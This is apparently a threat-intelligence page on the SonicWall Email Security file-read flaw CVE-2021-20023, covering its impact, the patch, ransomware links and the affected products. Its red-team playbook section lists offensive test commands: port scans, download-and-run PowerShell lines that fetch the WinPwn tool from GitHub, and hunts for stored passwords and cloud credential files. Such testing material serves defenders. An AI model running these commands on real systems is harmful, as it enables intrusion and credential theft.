CVE-2021-20023
Overview
This vulnerability is a directory traversal flaw in SonicWall Email Security version 10.0.9.x that allows an authenticated user with elevated privileges to read arbitrary files on the system. The root cause is insufficient validation of user-supplied input used in file path resolution within the email security appliance's file access functionality. The affected component is the file handling mechanism in the SonicWall Email Security appliance firmware and software.
Vulnerability Description
SonicWall Email Security version 10.0.9.x contains a vulnerability that allows a post-authenticated attacker to read an arbitrary file on the remote host.
Impact
An attacker with valid credentials and elevated privileges can exploit this vulnerability to read sensitive files on the SonicWall Email Security appliance, potentially exposing configuration files, credentials, or other critical data. This unauthorized file disclosure can facilitate further attacks such as credential theft or network reconnaissance. The prerequisite is possession of a high-privileged authenticated account. The business impact includes data breaches and compromised confidentiality of protected information within the email security infrastructure.
Solution
SonicWall has released patches addressing this vulnerability in updated versions of Email Security software and appliance firmware. Users should upgrade to the fixed versions beyond 10.0.9.x as detailed in SonicWall advisory SNWLID-2021-0010 available at https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0010. Applying these vendor-provided updates is the recommended remediation. No alternative workarounds are specified in the advisory.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability present in SonicWall Email Security version 10.0.9.x allows a post-authenticated attacker to read arbitrary files on the remote host. This issue arises from improper access controls that fail to adequately restrict file access based on user permissions. When an attacker gains access to a legitimate account, they can exploit this flaw to read sensitive files that should remain confidential. The potential for unauthorized access to sensitive data, including configuration files and user information, poses a significant risk to the integrity and confidentiality of the system.
Attack vectors for this vulnerability primarily involve authenticated users who have compromised legitimate credentials. Once an attacker has successfully logged in, they can leverage the file reading capability to extract sensitive information from the server. This could include configuration files that contain sensitive data, such as database credentials or API keys, which can further facilitate lateral movement within the network. Additionally, the attacker may exploit this access to gather intelligence about the system's architecture, potentially leading to more severe attacks, such as privilege escalation or data exfiltration.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on SonicWall Email Security for their email filtering and security needs. The ability to read arbitrary files can lead to data breaches, exposing sensitive information to unauthorized parties. This not only jeopardizes the affected organization’s reputation but also incurs financial costs related to incident response, regulatory fines, and potential lawsuits from affected customers. Furthermore, the breach of sensitive data could lead to loss of intellectual property, competitive advantage, and trust from clients and partners, ultimately affecting the organization’s bottom line.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regular security audits and vulnerability assessments can help identify and remediate weaknesses in the system. Monitoring user activity for unusual patterns, such as unauthorized file access attempts, can also aid in early detection of potential exploitation. Additionally, organizations should enforce the principle of least privilege, ensuring that users only have access to the files necessary for their roles. Patching the affected versions of SonicWall Email Security and applying any recommended security updates is crucial to closing this vulnerability and preventing exploitation.
In conclusion, the vulnerability in SonicWall Email Security presents a significant risk to organizations that utilize this product. The ability for authenticated attackers to read arbitrary files can lead to severe consequences, including data breaches and financial loss. By implementing robust detection and mitigation strategies, organizations can better protect themselves against the exploitation of this vulnerability and safeguard their sensitive information. Continuous monitoring, user education, and adherence to security best practices are essential components of a comprehensive security posture in the face of evolving threats.
CSURFACE threat intelligence has detected a significant increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2021-20023, rising nearly 30% to place it in the 0.98th percentile. This upward trend, coupled with its classification as a Known Exploited Vulnerability (KEV) linked to ransomware campaigns attributed to the Sinobi group, underscores a growing likelihood of exploitation attempts in the wild. Although no new exploit techniques or proof-of-concept code have surfaced, the elevated EPSS score signals heightened attacker interest and potential targeting. For defenders, this shift indicates an increased risk that threat actors may leverage this vulnerability as part of ransomware operations, warranting intensified vigilance despite the absence of new exploit details. Consequently, the threat level associated with CVE-2021-20023 should be considered elevated within the medium severity category due to its expanding exploitation probability and confirmed ransomware associations.
Affected Products (11)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sonicwall | Email Security | All |
cpe:2.3:a:sonicwall:email_security:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Email Security Appliance 9000 Firmware | All |
cpe:2.3:o:sonicwall:email_security_appliance_9000_firmware:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Email Security Appliance 3300 Firmware | All |
cpe:2.3:o:sonicwall:email_security_appliance_3300_firmware:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Email Security Appliance 4300 Firmware | All |
cpe:2.3:o:sonicwall:email_security_appliance_4300_firmware:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Email Security Appliance 8300 Firmware | All |
cpe:2.3:o:sonicwall:email_security_appliance_8300_firmware:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Email Security Appliance 5000 Firmware | All |
cpe:2.3:o:sonicwall:email_security_appliance_5000_firmware:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Email Security Appliance 7000 Firmware | All |
cpe:2.3:o:sonicwall:email_security_appliance_7000_firmware:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Email Security Appliance 5050 Firmware | All |
cpe:2.3:o:sonicwall:email_security_appliance_5050_firmware:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Email Security Appliance 7050 Firmware | All |
cpe:2.3:o:sonicwall:email_security_appliance_7050_firmware:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Email Security Virtual Appliance | All |
cpe:2.3:a:sonicwall:email_security_virtual_appliance:*:*:*:*:*:*:*:*
|
|
|
Sonicwall | Hosted Email Security | All |
cpe:2.3:a:sonicwall:hosted_email_security:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-20023 |
| psirt.global.sonicwall.com |
GitHub CVE
x_refsource_CONFIRM
|
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0010 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-20023 |